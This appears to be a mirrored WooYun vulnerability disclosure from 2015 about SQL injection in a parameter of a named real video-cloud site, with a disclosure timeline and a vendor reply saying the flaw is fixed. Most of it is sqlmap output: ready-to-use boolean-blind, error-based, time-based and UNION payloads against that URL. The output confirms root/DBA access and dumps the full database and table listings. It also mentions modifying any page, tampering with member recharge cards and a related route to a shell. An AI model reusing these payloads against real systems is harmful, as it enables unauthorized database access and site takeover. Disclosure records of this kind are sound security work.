乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-17: 细节已通知厂商并且等待厂商处理中 2015-07-21: 厂商已经确认,细节仅向厂商公开 2015-07-31: 细节向核心白帽子及相关领域专家公开 2015-08-10: 细节向普通白帽子公开 2015-08-20: 细节向实习白帽子公开 2015-09-04: 细节向公众公开
http://web2.cdvcloud.com/e/extend/live/?i=1&id=1
---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: i=1&id=1 RLIKE (SELECT (CASE WHEN (2786=2786) THEN 1 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: i=1&id=1 AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x71716a6b71,(SELECT (ELT(2373=2373,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: i=1&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))UeFH) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: i=1&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71716a6b71,0x77476c67665362504c69,0x716b767171),NULL,NULL-- ---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Trueavailable databases [17]:[*] information_schema[*] mysql[*] security[*] test[*] vms2_1[*] zqcms[*] zqcms10[*] zqcms11[*] zqcms12[*] zqcms13[*] zqcms14[*] zqcms2[*] zqcms3[*] zqcms4[*] zqcms6[*] zqcms7[*] zqcms9Database: zqcms[238 tables]+------------------------------+| hks_ecms_article || hks_ecms_article_check || hks_ecms_article_check_data || hks_ecms_article_data_1 || hks_ecms_article_doc || hks_ecms_article_doc_data || hks_ecms_article_doc_index || hks_ecms_article_index || hks_ecms_download || hks_ecms_download_check || hks_ecms_download_check_data || hks_ecms_download_data_1 || hks_ecms_download_doc || hks_ecms_download_doc_data || hks_ecms_download_doc_index || hks_ecms_download_index || hks_ecms_flash || hks_ecms_flash_check || hks_ecms_flash_check_data || hks_ecms_flash_data_1 || hks_ecms_flash_doc || hks_ecms_flash_doc_data || hks_ecms_flash_doc_index || hks_ecms_flash_index || hks_ecms_info || hks_ecms_info_check || hks_ecms_info_check_data || hks_ecms_info_data_1 || hks_ecms_info_doc || hks_ecms_info_doc_data || hks_ecms_info_doc_index || hks_ecms_info_index || hks_ecms_infoclass_article || hks_ecms_infoclass_download || hks_ecms_infoclass_flash || hks_ecms_infoclass_info || hks_ecms_infoclass_movie || hks_ecms_infoclass_news || hks_ecms_infoclass_photo || hks_ecms_infoclass_shop || hks_ecms_infotmp_article || hks_ecms_infotmp_download || hks_ecms_infotmp_flash || hks_ecms_infotmp_info || hks_ecms_infotmp_movie || hks_ecms_infotmp_news || hks_ecms_infotmp_photo || hks_ecms_infotmp_shop || hks_ecms_movie || hks_ecms_movie_check || hks_ecms_movie_check_data || hks_ecms_movie_data_1 || hks_ecms_movie_doc || hks_ecms_movie_doc_data || hks_ecms_movie_doc_index || hks_ecms_movie_index || hks_ecms_news || hks_ecms_news_check || hks_ecms_news_check_data || hks_ecms_news_data_1 || hks_ecms_news_doc || hks_ecms_news_doc_data || hks_ecms_news_doc_index || hks_ecms_news_index || hks_ecms_photo || hks_ecms_photo_check || hks_ecms_photo_check_data || hks_ecms_photo_data_1 || hks_ecms_photo_doc || hks_ecms_photo_doc_data || hks_ecms_photo_doc_index || hks_ecms_photo_index || hks_ecms_shop || hks_ecms_shop_check || hks_ecms_shop_check_data || hks_ecms_shop_data_1 || hks_ecms_shop_doc || hks_ecms_shop_doc_data || hks_ecms_shop_doc_index || hks_ecms_shop_index || hks_enewsad || hks_enewsadclass || hks_enewsadminstyle || hks_enewsbefrom || hks_enewsbq || hks_enewsbqclass || hks_enewsbqtemp || hks_enewsbqtempclass || hks_enewsbuybak || hks_enewsbuygroup || hks_enewscard || hks_enewsclass || hks_enewsclass_stats || hks_enewsclass_stats_ip || hks_enewsclass_stats_set || hks_enewsclassadd || hks_enewsclassf || hks_enewsclassnavcache || hks_enewsclasstemp || hks_enewsclasstempclass || hks_enewsdiggips || hks_enewsdo || hks_enewsdolog || hks_enewsdownerror || hks_enewsdownrecord || hks_enewsdownurlqz || hks_enewserrorclass || hks_enewsf || hks_enewsfava || hks_enewsfavaclass || hks_enewsfeedback || hks_enewsfeedbackclass || hks_enewsfeedbackf || hks_enewsfile_1 || hks_enewsfile_member || hks_enewsfile_other || hks_enewsfile_public || hks_enewsgbook || hks_enewsgbookclass || hks_enewsgfenip || hks_enewsgroup || hks_enewshmsg || hks_enewshnotice || hks_enewshy || hks_enewshyclass || hks_enewsindexpage || hks_enewsinfoclass || hks_enewsinfotype || hks_enewsinfovote || hks_enewsjstemp || hks_enewsjstempclass || hks_enewskey || hks_enewskeyclass || hks_enewslink || hks_enewslinkclass || hks_enewslinktmp || hks_enewslisttemp || hks_enewslisttempclass || hks_enewslog || hks_enewsloginfail || hks_enewsmember || hks_enewsmember_connect || hks_enewsmember_connect_app || hks_enewsmemberadd || hks_enewsmemberf || hks_enewsmemberfeedback || hks_enewsmemberform || hks_enewsmembergbook || hks_enewsmembergroup || hks_enewsmemberpub || hks_enewsmenu || hks_enewsmenuclass || hks_enewsmod || hks_enewsnewstemp || hks_enewsnewstempclass || hks_enewsnotcj || hks_enewsnotice || hks_enewspage || hks_enewspageclass || hks_enewspagetemp || hks_enewspayapi || hks_enewspayrecord || hks_enewspic || hks_enewspicclass || hks_enewspl_1 || hks_enewspl_set || hks_enewsplayer || hks_enewsplf || hks_enewspltemp || hks_enewspostdata || hks_enewspostserver || hks_enewsprinttemp || hks_enewspublic || hks_enewspublic_update || hks_enewspubtemp || hks_enewspubvar || hks_enewspubvarclass || hks_enewsqmsg || hks_enewssearch || hks_enewssearchall || hks_enewssearchall_load || hks_enewssearchtemp || hks_enewssearchtempclass || hks_enewsshop_address || hks_enewsshop_ddlog || hks_enewsshop_precode || hks_enewsshop_set || hks_enewsshopdd || hks_enewsshopdd_add || hks_enewsshoppayfs || hks_enewsshopps || hks_enewssp || hks_enewssp_1 || hks_enewssp_2 || hks_enewssp_3 || hks_enewssp_3_bak || hks_enewsspacestyle || hks_enewsspclass || hks_enewssql || hks_enewstable || hks_enewstags || hks_enewstagsclass || hks_enewstagsdata || hks_enewstask || hks_enewstempbak || hks_enewstempdt || hks_enewstempgroup || hks_enewstempvar || hks_enewstempvarclass || hks_enewstogzts || hks_enewsuser || hks_enewsuseradd || hks_enewsuserclass || hks_enewsuserjs || hks_enewsuserjsclass || hks_enewsuserlist || hks_enewsuserlistclass || hks_enewsuserloginck || hks_enewsvote || hks_enewsvotemod || hks_enewsvotetemp || hks_enewswapstyle || hks_enewswfinfo || hks_enewswfinfolog || hks_enewswords || hks_enewsworkflow || hks_enewsworkflowitem || hks_enewswriter || hks_enewsyh || hks_enewszt || hks_enewsztadd || hks_enewsztclass || hks_enewsztf || hks_enewsztinfo || hks_enewszttype || hks_enewszttypeadd || hks_tv || hks_tv_playlist |+------------------------------+Database: vms2_1[311 tables]+--------------------------------------+| hks_ecms_article || hks_ecms_article_check || hks_ecms_article_check_data || hks_ecms_article_data_1 || hks_ecms_article_doc || hks_ecms_article_doc_data || hks_ecms_article_doc_index || hks_ecms_article_index || hks_ecms_download || hks_ecms_download_check || hks_ecms_download_check_data || hks_ecms_download_data_1 || hks_ecms_download_doc || hks_ecms_download_doc_data || hks_ecms_download_doc_index || hks_ecms_download_index || hks_ecms_flash || hks_ecms_flash_check || hks_ecms_flash_check_data || hks_ecms_flash_data_1 || hks_ecms_flash_doc || hks_ecms_flash_doc_data || hks_ecms_flash_doc_index || hks_ecms_flash_index || hks_ecms_info || hks_ecms_info_check || hks_ecms_info_check_data || hks_ecms_info_data_1 || hks_ecms_info_doc || hks_ecms_info_doc_data || hks_ecms_info_doc_index || hks_ecms_info_index || hks_ecms_infoclass_article || hks_ecms_infoclass_download || hks_ecms_infoclass_flash || hks_ecms_infoclass_info || hks_ecms_infoclass_movie || hks_ecms_infoclass_news || hks_ecms_infoclass_photo || hks_ecms_infoclass_shop || hks_ecms_infotmp_article || hks_ecms_infotmp_download || hks_ecms_infotmp_flash || hks_ecms_infotmp_info || hks_ecms_infotmp_movie || hks_ecms_infotmp_news || hks_ecms_infotmp_photo || hks_ecms_infotmp_shop || hks_ecms_movie || hks_ecms_movie_check || hks_ecms_movie_check_data || hks_ecms_movie_data_1 || hks_ecms_movie_doc || hks_ecms_movie_doc_data || hks_ecms_movie_doc_index || hks_ecms_movie_index || hks_ecms_news || hks_ecms_news_check || hks_ecms_news_check_data || hks_ecms_news_data_1 || hks_ecms_news_doc || hks_ecms_news_doc_data || hks_ecms_news_doc_index || hks_ecms_news_index || hks_ecms_photo || hks_ecms_photo_check || hks_ecms_photo_check_data || hks_ecms_photo_data_1 || hks_ecms_photo_doc || hks_ecms_photo_doc_data || hks_ecms_photo_doc_index || hks_ecms_photo_index || hks_ecms_shop || hks_ecms_shop_check || hks_ecms_shop_check_data || hks_ecms_shop_data_1 || hks_ecms_shop_doc || hks_ecms_shop_doc_data || hks_ecms_shop_doc_index || hks_ecms_shop_index || hks_enewsad || hks_enewsadclass || hks_enewsadminstyle || hks_enewsbefrom || hks_enewsbq || hks_enewsbqclass || hks_enewsbqtemp || hks_enewsbqtempclass || hks_enewsbuybak || hks_enewsbuygroup || hks_enewscard || hks_enewsclass || hks_enewsclass_stats || hks_enewsclass_stats_ip || hks_enewsclass_stats_set || hks_enewsclassadd || hks_enewsclassf || hks_enewsclassnavcache || hks_enewsclasstemp || hks_enewsclasstempclass || hks_enewsdiggips || hks_enewsdo || hks_enewsdolog || hks_enewsdownerror || hks_enewsdownrecord || hks_enewsdownurlqz || hks_enewserrorclass || hks_enewsf || hks_enewsfava || hks_enewsfavaclass || hks_enewsfeedback || hks_enewsfeedbackclass || hks_enewsfeedbackf || hks_enewsfile_1 || hks_enewsfile_member || hks_enewsfile_other || hks_enewsfile_public || hks_enewsgbook || hks_enewsgbookclass || hks_enewsgfenip || hks_enewsgroup || hks_enewshmsg || hks_enewshnotice || hks_enewshy || hks_enewshyclass || hks_enewsindexpage || hks_enewsinfoclass || hks_enewsinfotype || hks_enewsinfovote || hks_enewsjstemp || hks_enewsjstempclass || hks_enewskey || hks_enewskeyclass || hks_enewslink || hks_enewslinkclass || hks_enewslinktmp || hks_enewslisttemp || hks_enewslisttempclass || hks_enewslog || hks_enewsloginfail || hks_enewsmember || hks_enewsmember_connect || hks_enewsmember_connect_app || hks_enewsmemberadd || hks_enewsmemberf || hks_enewsmemberfeedback || hks_enewsmemberform || hks_enewsmembergbook || hks_enewsmembergroup || hks_enewsmemberpub || hks_enewsmenu || hks_enewsmenuclass || hks_enewsmod || hks_enewsnewstemp || hks_enewsnewstempclass || hks_enewsnotcj || hks_enewsnotice || hks_enewspage || hks_enewspageclass || hks_enewspagetemp || hks_enewspayapi || hks_enewspayrecord || hks_enewspic || hks_enewspicclass || hks_enewspl_1 || hks_enewspl_set || hks_enewsplayer || hks_enewsplf || hks_enewspltemp || hks_enewspostdata || hks_enewspostserver || hks_enewsprinttemp || hks_enewspublic || hks_enewspublic_update || hks_enewspubtemp || hks_enewspubvar || hks_enewspubvarclass || hks_enewsqmsg || hks_enewssearch || hks_enewssearchall || hks_enewssearchall_load || hks_enewssearchtemp || hks_enewssearchtempclass || hks_enewsshop_address || hks_enewsshop_ddlog || hks_enewsshop_precode || hks_enewsshop_set || hks_enewsshopdd || hks_enewsshopdd_add || hks_enewsshoppayfs || hks_enewsshopps || hks_enewssp || hks_enewssp_1 || hks_enewssp_2 || hks_enewssp_3 || hks_enewssp_3_bak || hks_enewsspacestyle || hks_enewsspclass || hks_enewssql || hks_enewstable || hks_enewstags || hks_enewstagsclass || hks_enewstagsdata || hks_enewstask || hks_enewstempbak || hks_enewstempdt || hks_enewstempgroup || hks_enewstempvar || hks_enewstempvarclass || hks_enewstogzts || hks_enewsuser || hks_enewsuseradd || hks_enewsuserclass || hks_enewsuserjs || hks_enewsuserjsclass || hks_enewsuserlist || hks_enewsuserlistclass || hks_enewsuserloginck || hks_enewsvote || hks_enewsvotemod || hks_enewsvotetemp || hks_enewswapstyle || hks_enewswfinfo || hks_enewswfinfolog || hks_enewswords || hks_enewsworkflow || hks_enewsworkflowitem || hks_enewswriter || hks_enewsyh || hks_enewszt || hks_enewsztadd || hks_enewsztclass || hks_enewsztf || hks_enewsztinfo || hks_enewszttype || hks_enewszttypeadd || hks_tv || hks_tv_playlist || onair_vms_11101524 || onair_vms_111111165124 || onair_vms_1211212143821 || onair_vms_123101002 || onair_vms_123161902 || onair_vms_22104734 || onair_vms_22185548 || onair_vms_5jj134141 || onair_vms_678161918 || onair_vms_789144949 || onair_vms_IBCsaishixinxi100420 || onair_vms_OnAirshoulumoban153916 || onair_vms_Onair_shoulumoban100310 || onair_vms_cdn || onair_vms_ceshi195811 || onair_vms_cms || onair_vms_compile || onair_vms_connect || onair_vms_content_provider || onair_vms_dictionary || onair_vms_dictionary_info || onair_vms_fields || onair_vms_fields_template || onair_vms_generate || onair_vms_generate_gather || onair_vms_generate_gather_relation || onair_vms_generate_library_relation || onair_vms_hangzhoutaiceshi141045 || onair_vms_haoshengyin104109 || onair_vms_hello195033 || onair_vms_inspect_logs || onair_vms_jiandanmoban133303 || onair_vms_kekaomoban165738 || onair_vms_kekaomoban170021 || onair_vms_kuailejiazu155828 || onair_vms_library || onair_vms_logs || onair_vms_material || onair_vms_material_gather || onair_vms_material_gather_relation || onair_vms_material_library_relation || onair_vms_monvshuoshuo191541 || onair_vms_nanjingwangtai133756 || onair_vms_nanjingwangtaixin144451 || onair_vms_nihaoa165038 || onair_vms_onairyinpinmoban164943 || onair_vms_picture || onair_vms_picture_intercept || onair_vms_picture_intercept_auto || onair_vms_publish || onair_vms_publish_cms || onair_vms_publisher || onair_vms_shouluzhuanyong2192531 || onair_vms_shouluzhuanyongmoban191201 || onair_vms_statisticinfo || onair_vms_template || onair_vms_test184513 || onair_vms_transcode_task || onair_vms_transcode_template || onair_vms_user || onair_vms_wangtai133006 || onair_vms_xianggangweishi200933 || onair_vms_xiangximoban133204 || onair_vms_xinmeitimoban145511 || onair_vms_xinmeitimoban145742 || onair_vms_xinmeitimoban150117 || onair_vms_xinmeitimoban152041 || onair_vms_xinmeitimoban152126 || onair_vms_xinmeitimoban152234 || onair_vms_yinpinbianji090810 || onair_vms_yinpinmoban102522 || onair_vms_yinpinmoban173726 || onair_vms_yinpinmoren124730 |+--------------------------------------+ 可以推送消息给会员,可设置充值点卡。可以修改任意页面!shell参考: WooYun: 云视某处SQL注入导致后台getshell
可以推送消息给会员,可设置充值点卡。可以修改任意页面!shell参考: WooYun: 云视某处SQL注入导致后台getshell
fix
危害等级:低
漏洞Rank:5
确认时间:2015-07-21 15:58
感谢关注测试环境漏洞已修复
暂无
